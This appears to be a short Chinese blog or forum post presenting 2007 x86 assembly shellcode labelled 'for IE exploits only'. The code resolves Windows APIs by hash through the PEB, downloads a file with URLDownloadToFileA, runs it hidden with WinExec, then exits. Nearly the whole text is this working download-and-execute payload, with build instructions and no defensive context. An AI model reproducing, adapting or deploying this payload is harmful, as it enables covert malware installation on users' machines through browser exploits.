Download file from internet 的一个例子。 程序不能够单独run,需要在URLMON.dll 被load 的process 中运行,作者说是为IE 注入。

;; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!;; to test use /DTEST_CODE in ml command line;; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread();; 124 bytes;; for testing:;; ml /c /coff /Cp /DTEST_CODE dexec32.asm; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib;; wyse101 [at];; March 2007;      .386      .model flat,stdcall

      ROL_CONSTANT equ 5      ; int mrol(int iNum, int iBits)       ; {return (iNum << iBits) | (iNum >> (32 - iBits);}      mrol macro iNum:req,iBits:req           exitm <(iNum shl iBits) or (iNum shr (32-iBits))>      endm

      mror macro iNum:req,iBits:req           exitm <(iNum shr iBits) or (iNum shl (32-iBits))>      endm

      hashapi macro szApi              local dwApi

              dwApi = 0

              forc x,szApi                   dwApi = dwApi + '&x'                   dwApi = mrol(dwApi,ROL_CONSTANT)              endm              dwApi = mrol(dwApi,ROL_CONSTANT)              dw (dwApi and 0ffffh)      endm


      assume fs:nothing

code_start:      jmp load_dataIFDEF TEST_CODEextern URLDownloadToFileA   :proc      call URLDownloadToFileA                     ; included when assembled with /DTEST_CODEENDIFsetup_parameters:      pop edi                                     ; offset @cmd_start      xor eax,eax                                 ; eax = 0      cdq                                         ; edx = 0      ; ********************************************************************      push eax                                    ; exit code  = 0      ; ********************************************************************      push eax                                    ; SW_HIDE      mov dl,(@cmd_end-@cmd_start)-1              ; this allows command up to 255 bytes      push edi                                    ; file name to execute      ; ********************************************************************      push eax                                    ; callback routine URLDownLoadToFileA      push eax                                    ; reserved, must be zero      push edi                                    ; file name to save as      add edi,edx                                 ; get offset of @url_start-1      stosb                                       ; zero tail end      mov dl,(@url_end-@url_start)-1              ; limit of 255 bytes for url      push edi                                    ; url to download file from      push eax                                    ; interface      add edi,edx                                 ; get offset of @urlmon-1      stosb                                       ; zero tail end of url      ; *********************************************************************load_modules:      push edi                   ; save current offset to hashes      push 30h      pop ecx      mov eax,fs:[ecx]           ; PEB base address      mov eax,[eax+0ch]          ; PEB_LDR_DATA LoaderData      mov ebp,[eax+1ch]          ; LIST_ENTRY InMemoryOrderModuleListscan_dll:      mov ebx,[ebp+8]            ; DllBase      mov ebp,[ebp]              ; Flink      push ebp                   ; save

      mov eax,[ebx+3ch]      mov eax,[ebx+eax+78h]   ; IMAGE_DIRECTORY_ENTRY_EXPORT      lea esi,[ebx+eax+18h]   ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames      lodsd      xchg eax,ecx               ; ecx = NumberOfNames

      lodsd      add eax,ebx                ; AddressOfFunctions      push eax

      lodsd      lea edi,[eax+ebx]          ; AddressOfNames

      lodsd      lea ebp,[eax+ebx]         ; ebp = AddressOfNameOrdinalsload_api:      mov esi,[edi+4*ecx-4]      add esi,ebx      xor eax,eax      cdqhash_api:      lodsb      add edx,eax      rol edx,ROL_CONSTANT      dec eax      jns hash_api

      mov esi,[esp+8]                             ; get api hashes      cmp dx,word ptr[esi]                        ; found a match?      je call_api

      loop load_api      pop eax                                     ; check      pop ebp                                     ;      jmp scan_dllcall_api:      pop eax      movzx edx,word ptr [ebp+2*ecx-2]      add ebx,[eax+4*edx]      pop ebp                                     ; modules      pop edi                                     ; api hashes      call ebx                                    ; call api      stosw                                       ; advance 2 bytes to next hash      jmp load_modules                             ; do another, just keep going until ExitProcess is reached.      ; *************************load_data:      call setup_parameters@cmd_start:      db 'file.exe',0ffh                          ; WinExec("file.exe",SW_HIDE);@cmd_end:@url_start:      db '',0ffh         ; url of file to download@url_end:      hashapi <URLDownloadToFileA>      hashapi <WinExec>      hashapi <ExitProcess>      ; *********************************************************************

end code_start

; [2007-06-14]

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